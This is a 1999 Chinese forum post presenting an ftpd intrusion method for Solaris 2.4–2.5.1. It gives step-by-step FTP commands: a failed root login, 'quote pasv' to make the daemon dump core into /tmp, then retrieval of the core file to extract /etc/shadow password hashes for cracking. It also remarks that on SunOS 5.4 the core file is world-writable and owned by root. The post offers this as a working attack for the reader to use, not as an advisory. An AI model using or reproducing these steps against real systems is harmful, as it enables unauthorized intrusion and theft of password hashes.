发信人: amis()
整理人: williamlong(1999-05-31 13:15:11), 站内信件
|
ftpd
Solaris 2.4, Solaris 2.5, Solaris 2.5.1
这 可 能 是 目 前 为 止 最 简 单 ,但 又 是 最 有 效 的 入 侵 方 法 了
。
1、首 先 登 陆 上 你 的 ISP 的 主 机 ,WIN95 用 户 请 使 用其自带的ftp
.exe。 运行后
要做的步骤如下:
ftp>open xxx.xxx.xxxx.xxxx;你要登录的ftp主机名,如果不晓得,可以
试验一下自己email地址@后的部分。
ftp>Login:以你自己的名称及密码登录。
ftp> cd /tmp;进入主机tmp目录,因为这个目录全局可读写的,cd 命令后
记得要带个空格。
ftp> user root;这个命令尝试以root登录,接着系统会问你密码。
ftp> password;wrongpasswd;这里wrongpasswd的意思就是对于系统要你
输入的密码随便打一气。
ftp> quote pasv;照打
ftp> dis;暂时断开连接
下一步再次进入。
ftp> open xxx.xxx.xxxx.xxxx;
ftp> cd /tmp;
ftp> get core;取得core文件。
ftp> bye;断开连接。
2、实际上此时你可能已经取得系统的shadow了,虽然只是局部的shadow,
现在看看win95的桌面,应该有一个叫core的图标,看看此文件的长度,如
果非0,则恭喜你,现在使用“写字板”打开此文件,开始可能是一大堆乱
码,不去理他,直到你找到如下所示的部分。
root:a%r&ty12S3w^:12485::::
daemon:ddawd324:2444e432:::::
bin:eeqfv4354242:5353::::::::
......
这就是系统的shadow,立即剪辑成新文件,然后开始进行解密。
更有趣的是在sun-os5.4中,这个core文件的属性是rw-rw-rw,并且属于
root所有,再后面应该不用再讲了。
--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.96.243.142]
|
|